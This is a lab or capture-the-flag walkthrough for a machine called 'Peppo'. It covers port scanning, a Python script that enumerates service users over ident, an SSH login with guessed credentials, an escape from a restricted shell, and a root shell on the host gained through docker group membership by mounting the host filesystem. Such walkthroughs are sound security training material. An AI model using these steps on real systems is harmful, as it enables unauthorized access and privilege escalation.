Peppo

Nmap
sudo nmap 192.168.100.60 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp closed domain
113/tcp open ident FreeBSD identd
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open snet-sensor-mgmt?

As ident is running, we can use the Perl script ident-user-enum to identify which user each of the other services is running as.

Port 10000 reports it is running under the user 'Eleanor'. I tried brute-forcing the username on SSH and had no luck. Eventually, simply trying eleanor:eleanor, I was able to log in over SSH.
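The following is an added example, not part of the original write-up and not the ident-user-enum script itself; it reimplements the same idea in Python so the mechanism is visible. An ident daemon (RFC 1413) only answers for TCP connections it can actually see, so for each port the script first opens a real connection to the service, then asks port 113 which local user owns the server side of that connection. The target address and port list are assumptions taken from the Nmap output above.

```python
"""Map open TCP ports to the user each service runs as, via ident (RFC 1413).

Added example: a Python reimplementation of what ident-user-enum does.
TARGET and PORTS are assumptions copied from the Nmap scan above.
"""
import socket

IDENT_PORT = 113
TARGET = "192.168.100.60"          # assumed from the Nmap scan
PORTS = [22, 5432, 8080, 10000]    # open TCP ports from the scan (113 itself excluded)


def parse_ident_response(line):
    """Parse one ident reply line.

    USERID replies look like "<sport> , <cport> : USERID : <opsys> : <user>",
    ERROR replies like "<sport> , <cport> : ERROR : <reason>".
    Returns (server_port, client_port, user); user is None for an ERROR reply.
    Raises ValueError for anything else.
    """
    head, sep, rest = line.strip().partition(":")
    if not sep:
        raise ValueError("no ':' in ident reply: %r" % line)
    try:
        sport, cport = (int(p) for p in head.split(","))
    except ValueError as exc:
        raise ValueError("bad port pair in ident reply: %r" % line) from exc
    fields = [f.strip() for f in rest.split(":")]
    if fields[0] == "USERID" and len(fields) >= 3:
        # Some daemons allow ':' inside the user field, so keep the whole tail.
        return sport, cport, ":".join(fields[2:])
    if fields[0] == "ERROR":
        return sport, cport, None
    raise ValueError("unrecognised ident reply: %r" % line)


def ident_user(host, port, timeout=5.0):
    """Return the user owning host:port according to ident, or None on ERROR."""
    with socket.create_connection((host, port), timeout=timeout) as svc:
        local_port = svc.getsockname()[1]
        with socket.create_connection((host, IDENT_PORT), timeout=timeout) as ident:
            # The request is "<server-port> , <client-port>\r\n" from the
            # server's point of view: its port first, our ephemeral port second.
            ident.sendall(("%d , %d\r\n" % (port, local_port)).encode("ascii"))
            buf = b""
            while not buf.endswith(b"\n") and len(buf) < 1024:
                chunk = ident.recv(256)
                if not chunk:
                    break
                buf += chunk
    return parse_ident_response(buf.decode("ascii", errors="replace"))[2]


def enumerate_users(host, ports):
    """Query ident for every port; map port -> user, None, or an error string."""
    results = {}
    for port in ports:
        try:
            results[port] = ident_user(host, port)
        except (OSError, ValueError) as exc:
            results[port] = "error: %s" % exc
    return results


if __name__ == "__main__":
    for port, user in sorted(enumerate_users(TARGET, PORTS).items()):
        print("%5d/tcp  %s" % (port, user))
```

Ident replies are whatever the remote daemon chooses to send, so treat the usernames as hints for further enumeration (as done with SSH above), not as authenticated facts.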

Trying the id command shows we are locked into a restricted bash shell. We can check which commands are available to us by viewing the binaries we have access to.

Check GTFOBins for any of these binaries that can spawn a shell and so escape the restricted one:

After running the escape command, set a usable PATH, spawn a Python pty shell, and then set the PATH again so the new shell session is fully functional:
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
The id command shows we are a member of the docker group. GTFOBins again lists a method for spawning a root shell as a member of the docker group.

First, check what images are available to us:
docker image ls
We can use the GTFOBins command, replacing <alpine> with one of the images listed above:
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
Because the container mounts the host's / at /mnt and we chroot into it, the shell we get is root on the host filesystem:

If you found this page helpful to you, please rate it below as per the feedback options. For any corrections or general communications, please see the root page Pentest Everything for contact information.